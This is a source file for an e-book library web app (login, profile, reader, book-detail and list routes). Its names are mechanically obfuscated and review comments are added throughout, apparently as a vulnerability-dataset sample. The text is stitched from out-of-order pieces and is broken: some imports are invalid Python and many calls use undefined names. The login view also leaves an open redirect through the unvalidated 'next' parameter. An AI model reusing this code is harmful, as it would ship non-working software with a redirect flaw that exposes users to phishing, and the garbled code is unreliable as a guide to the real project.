                    VAR_3.debug(u"You are now logged in as: '%s'", VAR_104.name)
                    flash(_(u"You are now logged in as: '%(VAR_115)s'", VAR_115=VAR_104.name), category="success")
                    config.config_is_initial = False
                    return redirect_back(url_for("web.index"))
                else:
                    VAR_3.warning('Login failed for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
                    flash(_(u"Wrong Username or Password"), category="error")
    # NOTE(review): the 'next' query parameter is only compared against the
    # logout URL — it is otherwise passed through unvalidated, which is an
    # open-redirect risk (CWE-601); the target should be checked to be a
    # same-site URL. Also `next_url` below looks like a rename leftover for
    # VAR_97: if the condition is false, `next_url` is undefined — confirm.
    VAR_97 = request.args.get('next', default=url_for("web.index"), type=str)
    if url_for("web.logout") == VAR_97:
        next_url = url_for("web.index")
    return render_title_template('login.html',
                                 VAR_149=_(u"Login"),
                                 VAR_97=next_url,
                                 config=config,
                                 VAR_100=oauth_check,
                                 mail=config.get_mail_server_configured(), VAR_9="login")
@VAR_2.route('/logout')
@login_required
def FUNC_66():
    """Terminate the current session (including OAuth, when active) and
    return to the login page."""
    if VAR_87 is not None and VAR_87.is_authenticated:
        ub.delete_user_session(VAR_87.id, VAR_91.get('_id', ""))
        logout_user()
        if VAR_0['oauth'] and config.config_login_type in (2, 3):
            logout_oauth_user()
    VAR_3.debug(u"User logged out")
    return redirect(url_for('web.login'))
def FUNC_67(VAR_44, VAR_45, VAR_46, VAR_47, VAR_48):
    """Apply a submitted profile form for the current user.

    Updates password, kindle mail, e-mail, name (admin only), locale,
    default language and sidebar visibility, then commits.

    NOTE(review): the render_title_template calls pass `translations`,
    `languages`, `kobo_support` and `oauth_status` as keyword *values*,
    which are undefined names here (rename leftovers for VAR_47/VAR_48/
    VAR_44/VAR_46) — confirm against upstream.
    """
    VAR_55 = request.form.to_dict()
    VAR_87.random_books = 0
    if VAR_87.role_passwd() or VAR_87.role_admin():
        if VAR_55.get("password"):
            VAR_87.password = generate_password_hash(VAR_55["password"])
    try:
        if VAR_55.get("kindle_mail", VAR_87.kindle_mail) != VAR_87.kindle_mail:
            VAR_87.kindle_mail = valid_email(VAR_55["kindle_mail"])
        if VAR_55.get("email", VAR_87.email) != VAR_87.email:
            VAR_87.email = check_email(VAR_55["email"])
        if VAR_87.role_admin():
            if VAR_55.get("name", VAR_87.name) != VAR_87.name:
                VAR_87.name = check_username(VAR_55["name"])
        VAR_87.random_books = 1 if VAR_55.get("show_random") == "on" else 0
        if VAR_55.get("default_language"):
            VAR_87.default_language = VAR_55["default_language"]
        if VAR_55.get("locale"):
            VAR_87.locale = VAR_55["locale"]
        VAR_87.kobo_only_shelves_sync = int(VAR_55.get("kobo_only_shelves_sync") == "on") or 0
    except Exception as ex:
        flash(str(ex), category="error")
        return render_title_template("user_edit.html",
                                     VAR_116=VAR_87,
                                     VAR_47=translations,
                                     FUNC_68=1,
                                     VAR_48=languages,
                                     VAR_149=_(u"%(VAR_13)s's profile", VAR_13=VAR_87.name),
                                     VAR_9="me",
                                     VAR_44=kobo_support,
                                     registered_oauth=VAR_45,
                                     VAR_46=oauth_status)
    # Sidebar visibility is a bitmask assembled from checked "show_*" fields.
    VAR_98 = 0
    for key, VAR_64 in VAR_55.items():
        if key.startswith('show'):
            VAR_98 += int(key[5:])
    VAR_87.sidebar_view = VAR_98
    if VAR_55.get("Show_detail_random"):
        VAR_87.sidebar_view += constants.DETAIL_RANDOM
    try:
        ub.session.commit()
        flash(_(u"Profile updated"), category="success")
        VAR_3.debug(u"Profile updated")
    except IntegrityError:
        ub.session.rollback()
        flash(_(u"Found an existing account for this e-mail address"), category="error")
        VAR_3.debug(u"Found an existing account for this e-mail address")
    except OperationalError as e:
        ub.session.rollback()
        VAR_3.error("Database VAR_139: %s", e)
        flash(_(u"Database VAR_139: %(error)s.", VAR_139=e), category="error")
@VAR_2.route("/me", methods=["GET", "POST"])
@login_required
def FUNC_68():
    """Show (GET) or update (POST, via FUNC_67) the current user's profile."""
    VAR_48 = calibre_db.speaking_language()
    VAR_47 = babel.list_translations() + [LC('en')]
    VAR_44 = VAR_0['kobo'] and config.config_kobo_sync
    if VAR_0['oauth'] and config.config_login_type == 2:
        VAR_46 = get_oauth_status()
        VAR_45 = VAR_100
    else:
        VAR_46 = None
        VAR_45 = {}
    if request.method == "POST":
        FUNC_67(VAR_44, VAR_45, VAR_46, VAR_47, VAR_48)
    # NOTE(review): keyword values `translations`, `languages`,
    # `kobo_support`, `oauth_status` are undefined names here (rename
    # leftovers for VAR_47/VAR_48/VAR_44/VAR_46) — confirm.
    return render_title_template("user_edit.html",
                                 VAR_47=translations,
                                 FUNC_68=1,
                                 VAR_48=languages,
                                 VAR_116=VAR_87,
                                 VAR_44=kobo_support,
                                 VAR_149=_(u"%(VAR_13)s's profile", VAR_13=VAR_87.name),
                                 VAR_9="me",
                                 registered_oauth=VAR_45,
                                 VAR_46=oauth_status)
@VAR_2.route("/read/<int:VAR_5>/<VAR_6>")
@login_required_if_no_ano
@FUNC_2
def FUNC_69(VAR_5, VAR_6):
    """Open the in-browser reader matching format VAR_6 for book VAR_5
    (epub/pdf/txt/djvu, audio formats, or comic archives)."""
    VAR_95 = calibre_db.get_filtered_book(VAR_5)
    if not VAR_95:
        flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"), category="error")
        VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
        return redirect(url_for("web.index"))
    # NOTE(review): the bookmark looked up into VAR_99 is never used; the
    # templates receive FUNC_4 (always None) instead — looks like a rename
    # leftover, confirm against upstream.
    FUNC_4 = None
    if VAR_87.is_authenticated:
        VAR_99 = ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(VAR_87.id),
                                                           ub.Bookmark.book_id == VAR_5,
                                                           ub.Bookmark.format == VAR_6.upper())).first()
    if VAR_6.lower() == "epub":
        VAR_3.debug(u"Start epub reader for %d", VAR_5)
        return render_title_template('read.html', bookid=VAR_5, VAR_149=VAR_95.title, VAR_99=FUNC_4)
    elif VAR_6.lower() == "pdf":
        VAR_3.debug(u"Start pdf reader for %d", VAR_5)
        return render_title_template('readpdf.html', pdffile=VAR_5, VAR_149=VAR_95.title)
    elif VAR_6.lower() == "txt":
        VAR_3.debug(u"Start txt reader for %d", VAR_5)
        return render_title_template('readtxt.html', txtfile=VAR_5, VAR_149=VAR_95.title)
    elif VAR_6.lower() == "djvu":
        VAR_3.debug(u"Start djvu reader for %d", VAR_5)
        return render_title_template('readdjvu.html', djvufile=VAR_5, VAR_149=VAR_95.title)
    else:
        for fileExt in constants.EXTENSIONS_AUDIO:
            if VAR_6.lower() == fileExt:
                VAR_63 = calibre_db.get_filtered_book(VAR_5)
                VAR_3.debug(u"Start mp3 listening for %d", VAR_5)
                return render_title_template('listenmp3.html', mp3file=VAR_5, audioformat=VAR_6.lower(),
                                             entry=VAR_63, VAR_99=FUNC_4)
        for fileExt in ["cbr", "cbt", "cbz"]:
            if VAR_6.lower() == fileExt:
                VAR_148 = str(VAR_5)
                # Compose "Title - Series #index" for the comic reader header.
                VAR_149 = VAR_95.title
                if len(VAR_95.series):
                    VAR_149 = VAR_149 + " - " + VAR_95.series[0].name
                    if VAR_95.series_index:
                        VAR_149 = VAR_149 + " #" + '{0:.2f}'.format(VAR_95.series_index).rstrip('0').rstrip('.')
                VAR_3.debug(u"Start comic reader for %d", VAR_5)
                return render_title_template('readcbr.html', comicfile=VAR_148, VAR_149=title,
                                             extension=fileExt)
    VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
    flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"), category="error")
    return redirect(url_for("web.index"))
@VAR_2.route("/VAR_95/<int:VAR_5>")
@login_required_if_no_ano
def FUNC_70(VAR_5):
    """Render the detail page for book VAR_5: localized languages, shelves,
    read/archived status, available send/read formats and audio formats."""
    VAR_63 = calibre_db.get_filtered_book(VAR_5, allow_show_archived=True)
    if VAR_63:
        # Localize the language names for display.
        for FUNC_31 in range(0, len(VAR_63.languages)):
            VAR_63.languages[FUNC_31].language_name = isoLanguages.get_language_name(get_locale(), VAR_63.languages[
                FUNC_31].lang_code)
        VAR_16 = get_cc_columns(filter_config_custom_read=True)
        VAR_118 = []
        VAR_119 = ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == VAR_5).all()
        for entry in VAR_119:
            VAR_118.append(entry.shelf)
        if not VAR_87.is_anonymous:
            # Read state comes either from the app DB or a calibre custom column.
            if not config.config_read_column:
                VAR_146 = ub.session.query(ub.ReadBook). \
                    filter(and_(ub.ReadBook.user_id == int(VAR_87.id), ub.ReadBook.book_id == VAR_5)).all()
                VAR_142 = len(
                    VAR_146) > 0 and VAR_146[0].read_status == ub.ReadBook.STATUS_FINISHED
            else:
                try:
                    VAR_146 = getattr(VAR_63, 'custom_column_' + str(config.config_read_column))
                    VAR_142 = len(VAR_146) > 0 and VAR_146[0].value
                except (KeyError, AttributeError):
                    VAR_3.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
                    VAR_142 = None
            VAR_54 = ub.session.query(ub.ArchivedBook).\
                filter(and_(ub.ArchivedBook.user_id == int(VAR_87.id),
                            ub.ArchivedBook.book_id == VAR_5)).first()
            VAR_141 = VAR_54 and VAR_54.is_archived
        else:
            VAR_142 = None
            VAR_141 = None
        VAR_63.tags = VAR_7(VAR_63.tags, key=lambda tag: tag.name)
        VAR_63 = calibre_db.order_authors(VAR_63)
        VAR_120 = check_send_to_kindle(VAR_63)
        VAR_121 = check_read_formats(VAR_63)
        VAR_122 = []
        for media_format in VAR_63.data:
            if media_format.format.lower() in constants.EXTENSIONS_AUDIO:
                VAR_122.append(media_format.format.lower())
        # NOTE(review): keyword values `audioentries`, `cc`, `have_read`,
        # `is_archived`, `kindle_list`, `reader_list` are undefined names
        # here (rename leftovers for the locals above) — confirm.
        return render_title_template('detail.html',
                                     entry=VAR_63,
                                     VAR_122=audioentries,
                                     VAR_16=cc,
                                     is_xhr=request.headers.get('X-Requested-With')=='XMLHttpRequest',
                                     VAR_149=VAR_63.title,
                                     books_shelfs=VAR_118,
                                     VAR_142=have_read,
                                     VAR_141=is_archived,
                                     VAR_120=kindle_list,
                                     VAR_121=reader_list,
                                     VAR_9="book")
    else:
        VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
        flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"),
              category="error")
        return redirect(url_for("web.index"))
|
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
import mimetypes
import chardet # dependency of requests
import copy
from babel.dates import .format_date
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, jsonify
from flask import request, redirect, send_from_directory, make_response, flash, abort, url_for
from flask import session as VAR_91
from flask_babel import gettext as _
from flask_login import .login_user, logout_user, login_required, VAR_87
from sqlalchemy.exc import IntegrityError, InvalidRequestError, OperationalError
from sqlalchemy.sql.expression import text, func, false, not_, and_, or_
from sqlalchemy.orm.attributes import .flag_modified
from sqlalchemy.sql.functions import coalesce
from .services.worker import WorkerThread
from werkzeug.datastructures import Headers
from werkzeug.security import generate_password_hash, check_password_hash
from . import constants, logger, isoLanguages, services
from . import babel, db, ub, config, get_locale, app
from . import calibre_db
from .gdriveutils import getFileFromEbooksFolder, do_gdrive_download
from .helper import check_valid_domain, render_task_status, check_email, check_username, \
get_cc_columns, get_book_cover, get_download_link, send_mail, generate_random_password, \
send_registration_mail, check_send_to_kindle, check_read_formats, tags_filters, reset_password, valid_email
from .pagination import Pagination
from .redirect import redirect_back
from .usermanagement import .login_required_if_no_ano
from .render_template import render_title_template
# Feature-availability flags, derived from which optional services imported.
VAR_0 = {
    'ldap': bool(services.ldap),
    'goodreads': bool(services.goodreads_support),
    'kobo': bool(services.kobo)
}
# OAuth support is optional; VAR_100 is the fallback oauth_check mapping.
# NOTE(review): the import line below is garbled ("import .oauth_check" is
# not valid Python) — looks like extraction damage, confirm against upstream.
try:
    from .oauth_bb import .oauth_check, register_user_with_oauth, logout_oauth_user, get_oauth_status
    VAR_0['oauth'] = True
except ImportError:
    VAR_0['oauth'] = False
    VAR_100 = {}
try:
    from functools import wraps
except ImportError:
    pass  # We're not using Python 3
try:
    from natsort import natsorted as VAR_7
except ImportError:
    VAR_7 = sorted  # Just use regular VAR_7 then, may cause issues with badly named pages in cbz/cbr files
@app.after_request
def FUNC_0(VAR_1):
    """Attach security-related HTTP headers to every outgoing response."""
    csp = "default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' VAR_8:"
    if request.endpoint == "editbook.edit_book":
        # The edit page loads remote metadata/cover sources.
        csp += " *"
    VAR_1.headers['Content-Security-Policy'] = csp
    for header_name, header_value in (
            ('X-Content-Type-Options', 'nosniff'),
            ('X-Frame-Options', 'SAMEORIGIN'),
            ('X-XSS-Protection', '1; mode=block'),
            ('Strict-Transport-Security', 'max-age=31536000; includeSubDomains'),
    ):
        VAR_1.headers[header_name] = header_value
    return VAR_1
# Blueprint holding all regular web-UI routes, and the module-level logger.
VAR_2 = Blueprint('web', __name__)
VAR_3 = logger.create()
def FUNC_1(VAR_4):
    """Decorator: allow the wrapped view only for users with download role."""
    @wraps(VAR_4)
    def _guarded(*call_args, **call_kwargs):
        if not VAR_87.role_download():
            abort(403)
        return VAR_4(*call_args, **call_kwargs)
    return _guarded
def FUNC_2(VAR_4):
    """Decorator: allow the wrapped view only for users with viewer role."""
    @wraps(VAR_4)
    def _guarded(*call_args, **call_kwargs):
        if not VAR_87.role_viewer():
            abort(403)
        return VAR_4(*call_args, **call_kwargs)
    return _guarded
@VAR_2.route("/ajax/emailstat")
@login_required
def FUNC_3():
    """Return the current background-task list rendered as JSON."""
    return jsonify(render_task_status(WorkerThread.getInstance().tasks))
@VAR_2.route("/ajax/VAR_99/<int:VAR_5>/<VAR_6>", methods=['POST'])
@login_required
def VAR_99(VAR_5, VAR_6):
    """Replace the reader bookmark for (user, book, format); an empty posted
    key deletes it (204), otherwise the new bookmark is stored (201)."""
    VAR_52 = request.form["bookmark"]
    # Remove any existing bookmark for this user/book/format first.
    ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(VAR_87.id),
                                              ub.Bookmark.book_id == VAR_5,
                                              ub.Bookmark.format == VAR_6)).delete()
    if not VAR_52:
        ub.session_commit()
        return "", 204
    # NOTE(review): `book_id` and `bookmark_key` are undefined names here —
    # rename leftovers, presumably VAR_5 and VAR_52 were meant; confirm.
    VAR_53 = ub.Bookmark(VAR_11=VAR_87.id,
                         VAR_5=book_id,
                         format=VAR_6,
                         VAR_52=bookmark_key)
    ub.session.merge(VAR_53)
    ub.session_commit("Bookmark for VAR_104 {} in VAR_95 {} created".format(VAR_87.id, VAR_5))
    return "", 201
@VAR_2.route("/ajax/toggleread/<int:VAR_5>", methods=['POST'])
@login_required
def FUNC_5(VAR_5):
    """Toggle the read flag of book VAR_5, either in the app database or in
    the configured calibre custom column. Returns "" on success, 400 on error.

    NOTE(review): `book_id` in the ub.ReadBook/ub.KoboReadingState
    constructors is an undefined name (rename leftover for VAR_5) — confirm.
    """
    if not config.config_read_column:
        # Read state tracked in Calibre-Web's own database.
        VAR_95 = ub.session.query(ub.ReadBook).filter(and_(ub.ReadBook.user_id == int(VAR_87.id),
                                                           ub.ReadBook.book_id == VAR_5)).first()
        if VAR_95:
            if VAR_95.read_status == ub.ReadBook.STATUS_FINISHED:
                VAR_95.read_status = ub.ReadBook.STATUS_UNREAD
            else:
                VAR_95.read_status = ub.ReadBook.STATUS_FINISHED
        else:
            VAR_123 = ub.ReadBook(VAR_11=VAR_87.id, VAR_5 = book_id)
            VAR_123.read_status = ub.ReadBook.STATUS_FINISHED
            VAR_95 = VAR_123
        if not VAR_95.kobo_reading_state:
            VAR_124 = ub.KoboReadingState(VAR_11=VAR_87.id, VAR_5=book_id)
            VAR_124.current_bookmark = ub.KoboBookmark()
            VAR_124.statistics = ub.KoboStatistics()
            VAR_95.kobo_reading_state = VAR_124
        ub.session.merge(VAR_95)
        ub.session_commit("Book {} readbit toggled".format(VAR_5))
    else:
        # Read state tracked in a calibre custom column.
        try:
            calibre_db.update_title_sort(config)
            VAR_95 = calibre_db.get_filtered_book(VAR_5)
            VAR_26 = getattr(VAR_95, 'custom_column_' + str(config.config_read_column))
            if len(VAR_26):
                VAR_26[0].value = not VAR_26[0].value
                calibre_db.session.commit()
            else:
                VAR_143 = db.cc_classes[config.config_read_column]
                VAR_144 = VAR_143(value=1, VAR_95=VAR_5)
                calibre_db.session.add(VAR_144)
                calibre_db.session.commit()
        except (KeyError, AttributeError):
            VAR_3.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
            return "Custom Column No.{} is not existing in calibre database".format(config.config_read_column), 400
        except (OperationalError, InvalidRequestError) as e:
            calibre_db.session.rollback()
            VAR_3.error(u"Read status could not set: %e", e)
            return "Read status could not set: {}".format(e), 400
    return ""
@VAR_2.route("/ajax/togglearchived/<int:VAR_5>", methods=['POST'])
@login_required
def FUNC_6(VAR_5):
    """Toggle the archived flag of book VAR_5 for the current user."""
    VAR_54 = ub.session.query(ub.ArchivedBook).filter(and_(ub.ArchivedBook.user_id == int(VAR_87.id),
                                                           ub.ArchivedBook.book_id == VAR_5)).first()
    if VAR_54:
        VAR_54.is_archived = not VAR_54.is_archived
        VAR_54.last_modified = datetime.utcnow()
    else:
        # NOTE(review): `book_id` is undefined (rename leftover for VAR_5).
        VAR_54 = ub.ArchivedBook(VAR_11=VAR_87.id, VAR_5=book_id)
        VAR_54.is_archived = True
    ub.session.merge(VAR_54)
    ub.session_commit("Book {} archivebit toggled".format(VAR_5))
    return ""
@VAR_2.route("/ajax/view", methods=["POST"])
@login_required_if_no_ano
def FUNC_7():
    """Persist nested per-user view settings posted as JSON; any malformed
    payload yields a 400."""
    VAR_55 = request.get_json()
    try:
        for section, properties in VAR_55.items():
            for prop_name, prop_value in properties.items():
                VAR_87.set_view_property(section, prop_name, prop_value)
    except Exception as ex:
        VAR_3.error("Could not save view_settings: %r %r: %e", request, VAR_55, ex)
        return "Invalid request", 400
    return "1", 200
'''
@VAR_2.route("/ajax/getcomic/<int:VAR_5>/<VAR_6>/<int:VAR_9>")
@login_required
def get_comic_book(VAR_5, VAR_6, VAR_9):
VAR_95 = calibre_db.get_book(VAR_5)
if not VAR_95:
return "", 204
else:
for bookformat in VAR_95.data:
if bookformat.format.lower() == VAR_6.lower():
cbr_file = os.path.join(config.config_calibre_dir, VAR_95.path, bookformat.name) + "." + VAR_6
if VAR_6 in ("cbr", "rar"):
if VAR_0['rar'] == True:
rarfile.UNRAR_TOOL = config.config_rarfile_location
try:
rf = rarfile.RarFile(cbr_file)
names = VAR_7(rf.namelist())
extract = lambda VAR_9: rf.read(names[VAR_9])
except:
VAR_3.error('Unrar binary not found, or unable to decompress file %s', cbr_file)
return "", 204
else:
VAR_3.info('Unrar is not supported please install python rarfile extension')
return "", 204
elif VAR_6 in ("cbz", "zip"):
zf = zipfile.ZipFile(cbr_file)
names=VAR_7(zf.namelist())
extract = lambda VAR_9: zf.read(names[VAR_9])
elif VAR_6 in ("cbt", "tar"):
tf = tarfile.TarFile(cbr_file)
names=VAR_7(tf.getnames())
extract = lambda VAR_9: tf.extractfile(names[VAR_9]).read()
else:
VAR_3.error('unsupported comic format')
return "", 204
if sys.version_info.major >= 3:
b64 = codecs.encode(extract(VAR_9), 'base64').decode()
else:
b64 = extract(VAR_9).encode('base64')
ext = names[VAR_9].rpartition('.')[-1]
if ext not in ('png', 'gif', 'jpg', 'jpeg', 'webp'):
ext = 'png'
extractedfile="data:image/" + ext + ";base64," + b64
fileData={"name": names[VAR_9], "page":VAR_9, "last":len(names)-1, "content": extractedfile}
return make_response(json.dumps(fileData))
return "", 204
'''
@VAR_2.route("/get_authors_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_8():
    """Typeahead suggestions for author names."""
    query_text = request.args.get('q')
    return calibre_db.get_typeahead(db.Authors, query_text, ('|', ','))
@VAR_2.route("/get_publishers_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_9():
    """Typeahead suggestions for publisher names."""
    query_text = request.args.get('q')
    return calibre_db.get_typeahead(db.Publishers, query_text, ('|', ','))
@VAR_2.route("/get_tags_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_10():
    """Typeahead suggestions for tags, honoring the user's tag restrictions."""
    query_text = request.args.get('q')
    return calibre_db.get_typeahead(db.Tags, query_text, tag_filter=tags_filters())
@VAR_2.route("/get_series_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_11():
    """Typeahead suggestions for series names."""
    query_text = request.args.get('q')
    return calibre_db.get_typeahead(db.Series, query_text)
@VAR_2.route("/get_languages_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_12():
    """Typeahead suggestions for language names (at most five entries).

    Prefix matches are preferred; substring matches fill up to five.
    """
    VAR_56 = (request.args.get('q') or '').lower()
    VAR_57 = isoLanguages.get_language_names(get_locale())
    VAR_58 = [s for key, s in VAR_57.items() if s.lower().startswith(VAR_56.lower())]
    if len(VAR_58) < 5:
        VAR_63 = [s for key, s in VAR_57.items() if VAR_56 in s.lower()]
        VAR_58.extend(VAR_63[0:(5 - len(VAR_58))])
    # BUG FIX: the de-duplicated list was previously assigned to a dead
    # variable (entries_start) and discarded, so duplicate names from the
    # prefix and substring passes could reach the client.
    VAR_58 = list(set(VAR_58))
    VAR_59 = json.dumps([dict(VAR_13=r) for r in VAR_58[0:5]])
    return VAR_59
@VAR_2.route("/get_matching_tags", methods=['GET'])
@login_required_if_no_ano
def FUNC_13():
    """Return, as JSON, the ids of all tags still present on books matching
    the given author/title/tag filters (used to grey out impossible tags).

    NOTE(review): the ``q.filter(...)`` calls reference an undefined name
    `q` (rename leftover for VAR_21) — confirm against upstream.
    """
    VAR_60 = {'tags': []}
    VAR_21 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters(True))
    calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
    VAR_61 = request.args.get('author_name') or ''
    VAR_62 = request.args.get('book_title') or ''
    VAR_29 = request.args.getlist('include_tag') or ''
    VAR_30 = request.args.getlist('exclude_tag') or ''
    VAR_21 = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + VAR_61 + "%")),
                      func.lower(db.Books.title).ilike("%" + VAR_62 + "%"))
    if len(VAR_29) > 0:
        for tag in VAR_29:
            VAR_21 = q.filter(db.Books.tags.any(db.Tags.id == tag))
    if len(VAR_30) > 0:
        for tag in VAR_30:
            VAR_21 = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
    # Collect the distinct tag ids of every remaining book.
    for VAR_95 in VAR_21:
        for tag in VAR_95.tags:
            if tag.id not in VAR_60['tags']:
                VAR_60['tags'].append(tag.id)
    VAR_59 = json.dumps(VAR_60)
    return VAR_59
def FUNC_14(VAR_7, VAR_8):
    """Translate a sort token into a list of SQLAlchemy order-by clauses.

    'stored' re-loads the user's saved sort preference for page VAR_8;
    any other token is persisted as the new preference first. Unknown
    tokens fall back to newest-first.
    """
    if VAR_7 == 'stored':
        VAR_7 = VAR_87.get_view_property(VAR_8, 'stored')
    else:
        VAR_87.set_view_property(VAR_8, 'stored', VAR_7)
    sort_orders = {
        'pubnew': [db.Books.pubdate.desc()],
        'pubold': [db.Books.pubdate],
        'abc': [db.Books.sort],
        'zyx': [db.Books.sort.desc()],
        'new': [db.Books.timestamp.desc()],
        'old': [db.Books.timestamp],
        'authaz': [db.Books.author_sort.asc(), db.Series.name, db.Books.series_index],
        'authza': [db.Books.author_sort.desc(), db.Series.name.desc(), db.Books.series_index.desc()],
        'seriesasc': [db.Books.series_index.asc()],
        'seriesdesc': [db.Books.series_index.desc()],
    }
    return sort_orders.get(VAR_7, [db.Books.timestamp.desc()])
def FUNC_15(VAR_8, VAR_7, VAR_5, VAR_9):
    """Dispatch a book-list request to the matching renderer.

    VAR_8 names the list type (rated/discover/unread/...), VAR_7 the sort
    token, VAR_5 an optional entity id (author, series, ...) and VAR_9 the
    page number. Falls through to the plain index listing.
    """
    VAR_10 = FUNC_14(VAR_7, VAR_8)
    # NOTE(review): `order` passed below is an undefined name (rename
    # leftover for VAR_10) — confirm against upstream.
    if VAR_8 == "rated":
        return FUNC_16(VAR_9, VAR_5, VAR_10=order)
    elif VAR_8 == "discover":
        return FUNC_17(VAR_9, VAR_5)
    elif VAR_8 == "unread":
        return FUNC_27(VAR_9, False, VAR_10=order)
    elif VAR_8 == "read":
        return FUNC_27(VAR_9, True, VAR_10=order)
    elif VAR_8 == "hot":
        return FUNC_18(VAR_9)
    elif VAR_8 == "download":
        return FUNC_19(VAR_9, VAR_10, VAR_5)
    elif VAR_8 == "author":
        return FUNC_20(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "publisher":
        return FUNC_21(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "series":
        return FUNC_22(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "ratings":
        return FUNC_23(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "formats":
        return FUNC_24(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "category":
        return FUNC_25(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "language":
        return FUNC_26(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "archived":
        return FUNC_28(VAR_9, VAR_10)
    elif VAR_8 == "search":
        VAR_17 = (request.args.get('query') or '')
        VAR_18 = int(int(config.config_books_per_page) * (VAR_9 - 1))
        return FUNC_30(VAR_17, VAR_18, VAR_10, config.config_books_per_page)
    elif VAR_8 == "advsearch":
        # Re-run the advanced search stored in the session.
        VAR_17 = json.loads(VAR_91['query'])
        VAR_18 = int(int(config.config_books_per_page) * (VAR_9 - 1))
        return FUNC_57(VAR_17, VAR_18, VAR_10, config.config_books_per_page)
    else:
        VAR_150 = VAR_8 or "newest"
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0, db.Books, True, VAR_10,
                                                           db.books_series_link,
                                                           db.Books.id == db.books_series_link.c.book,
                                                           db.Series)
        # NOTE(review): `random` / `pagination` below are undefined names
        # (rename leftovers for VAR_68 / VAR_65) — confirm.
        return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
                                     VAR_149=_(u"Books"), VAR_9=VAR_150)
def FUNC_16(VAR_9, VAR_5, VAR_10):
    """Render page VAR_9 of the "Top Rated Books" list (rating > 9, i.e. 5 stars).

    404s when the current user may not see the best-rated sidebar section.
    """
    if VAR_87.check_visibility(constants.SIDEBAR_BEST_RATED):
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           db.Books.ratings.any(db.Ratings.rating > 9),
                                                           VAR_10,
                                                           db.books_series_link,
                                                           db.Books.id == db.books_series_link.c.book,
                                                           db.Series)
        # NOTE(review): `pagination` here is not the local VAR_65 — renaming artifact?
        return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
                                     id=VAR_5, VAR_149=_(u"Top Rated Books"), VAR_9="rated")
    else:
        abort(404)
def FUNC_17(VAR_9, VAR_5):
    """Render the "Discover" page: a random selection of visible books.

    The fill_indexpage pagination is discarded and replaced with a fixed
    single-page Pagination, since random results have no stable ordering.
    """
    if VAR_87.check_visibility(constants.SIDEBAR_RANDOM):
        VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0, db.Books, True, [func.randomblob(2)])
        VAR_65 = Pagination(1, config.config_books_per_page, config.config_books_per_page)
        return render_title_template('discover.html', VAR_63=VAR_63, VAR_65=pagination, id=VAR_5,
                                     VAR_149=_(u"Discover (Random Books)"), VAR_9="discover")
    else:
        abort(404)
def FUNC_18(VAR_9):
    """Render the "Hot Books" page: books ranked by download count.

    Downloads pointing at books that no longer exist (or are filtered out for
    this user) are pruned from the downloads table as a side effect.
    """
    if VAR_87.check_visibility(constants.SIDEBAR_HOT):
        if VAR_87.show_detail_random():
            VAR_68 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
                .order_by(func.random()).limit(config.config_random_books)
        else:
            VAR_68 = false()
        VAR_79 = int(int(config.config_books_per_page) * (VAR_9 - 1))  # page offset
        # Download counts grouped per book, most-downloaded first.
        VAR_101 = ub.session.query(ub.Downloads, func.count(ub.Downloads.book_id)).order_by(
            func.count(ub.Downloads.book_id).desc()).group_by(ub.Downloads.book_id)
        VAR_102 = VAR_101.offset(VAR_79).limit(config.config_books_per_page)
        VAR_63 = list()
        for VAR_95 in VAR_102:
            VAR_125 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).filter(
                db.Books.id == VAR_95.Downloads.book_id).first()
            if VAR_125:
                VAR_63.append(VAR_125)
            else:
                # Stale download record: the book is gone, drop the entry.
                ub.delete_download(VAR_95.Downloads.book_id)
        VAR_103 = VAR_63.__len__()
        VAR_65 = Pagination(VAR_9, config.config_books_per_page, VAR_103)
        return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
                                     VAR_149=_(u"Hot Books (Most Downloaded)"), VAR_9="hot")
    else:
        abort(404)
def FUNC_19(VAR_9, VAR_10, VAR_11):
    """Render the books downloaded by a user.

    Admins may view any user id VAR_11; everyone else is forced to their own id.
    Stale download records (book removed from the library) are pruned.
    """
    if VAR_87.role_admin():
        VAR_11 = int(VAR_11)
    else:
        VAR_11 = VAR_87.id
    if VAR_87.check_visibility(constants.SIDEBAR_DOWNLOAD):
        if VAR_87.show_detail_random():
